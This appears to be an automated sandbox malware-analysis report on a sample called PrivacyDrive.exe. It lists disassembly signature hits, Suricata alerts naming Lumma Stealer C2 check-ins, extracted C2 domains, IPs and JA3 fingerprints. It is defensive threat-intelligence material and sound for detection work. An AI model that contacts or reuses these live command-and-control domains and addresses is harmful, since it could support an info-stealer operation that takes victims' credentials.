Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 4_2_051A5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 4_2_051CED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 4_2_051CED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 4_2_051E9C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_051C8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 4_2_051A4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 4_2_051BDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 4_2_051B0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 4_2_051BAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_051B3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+28h] 4_2_051B3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then push ebx 4_2_051BDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_051E7E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh 4_2_051E7E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, ecx 4_2_051B3EA6
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 4_2_051C6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_051B399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 4_2_051E49F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_051D2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_051D2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 4_2_051E3870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_051D2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_051D2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 4_2_051DA880
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00F86013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00F8600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 8_2_00F811B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 8_2_00F9D0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 8_2_00F92132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 8_2_00F9D134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00FB12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h 8_2_00FB12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00FBC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_00FA429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_00FA429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_00FAC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 8_2_00FB5272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_00FA4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_00FA4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 8_2_00FB63F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00F8539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 8_2_00F98312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 8_2_00F874E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 8_2_00F7F4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, 0000000Bh 8_2_00FA54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebp, word ptr [edi] 8_2_00FB0432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 8_2_00F92403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+00000744h] 8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 8_2_00F925AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_00F98582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00F9F577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 8_2_00F8F6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 8_2_00F766B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00F9A692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_00FBB612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_00FA076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_00FA076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 8_2_00F77712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, ecx 8_2_00F858A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00FB9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh 8_2_00FB9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then push ebx 8_2_00F8F835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00F859AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+28h] 8_2_00F859AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 8_2_00F8C952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 8_2_00F82911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 8_2_00F87AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp eax 8_2_00F87BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 8_2_00FBBBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [esi], ax 8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, eax 8_2_00F78B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp ecx 8_2_00FB0B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00FA4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 8_2_00FB2B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_00F84DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_00FA1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 8_2_00F99DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-34h] 8_2_00F95D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 8_2_00FBBD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 8_2_00FB0EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_00FA3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 8_2_00FBBED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] 8_2_00F9FEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00FA4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00FB4E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00FA4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_00FA0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00FBBFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_00FA3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_00FA3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 8_2_0121A1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 8_2_011DF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 8_2_01211100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp ecx 8_2_0120F160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0120314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, eax 8_2_011D7170
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [esi], ax 8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp eax 8_2_011E61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 8_2_011E60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 8_2_0121A360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-34h] 8_2_011F4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_012003B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 8_2_011F83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_011E33DB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_01202531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_012024B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_0121A5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_01213420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0120342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_011FF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_01203419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 8_2_0120F4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] 8_2_011FE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_012024D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 8_2_0121A4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 8_2_011FB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 8_2_011FB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 8_2_011F0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_011E4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_011E460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 8_2_011F6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_011E399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 8_2_012149F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_01202813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_01202813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 8_2_01213870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_0121A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_0120A880
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_01202899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_01202899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_0120F8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h 8_2_0120F8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_011FDB75
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_011F6B80
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 8_2_011F0BAC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+00000744h] 8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebp, word ptr [edi] 8_2_0120EA30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 8_2_011F0A01
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, 0000000Bh 8_2_01203AB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 8_2_011DDAB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 8_2_011E5ADF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 8_2_011D5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_011FED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_011FED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_01219C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_011F8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 8_2_011D4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 8_2_011EDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 8_2_011E0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 8_2_011EAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_011E3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+28h] 8_2_011E3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_01217E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh 8_2_01217E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then push ebx 8_2_011EDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, ecx 8_2_011E3EA6

Networking

Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.4:50546 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49749 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 172.67.206.221:443
Source: Malware configuration extractor URLs: abortinoiwiam.shop
Source: Malware configuration extractor URLs: deallyharvenw.shop
Source: Malware configuration extractor URLs: defenddsouneuw.shop
Source: Malware configuration extractor URLs: pumpkinkwquo.shop
Source: Malware configuration extractor URLs: covvercilverow.shop
Source: Malware configuration extractor URLs: surroundeocw.shop
Source: Malware configuration extractor URLs: priooozekw.shop
Source: Malware configuration extractor URLs: candleduseiwo.shop
Source: Malware configuration extractor URLs: racedsuitreow.shop
Source: Joe Sandbox View IP Address: 185.255.122.133 185.255.122.133
Source: Joe Sandbox View IP Address: 172.67.206.221 172.67.206.221
Source: Joe Sandbox View ASN Name: ICMESE ICMESE
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
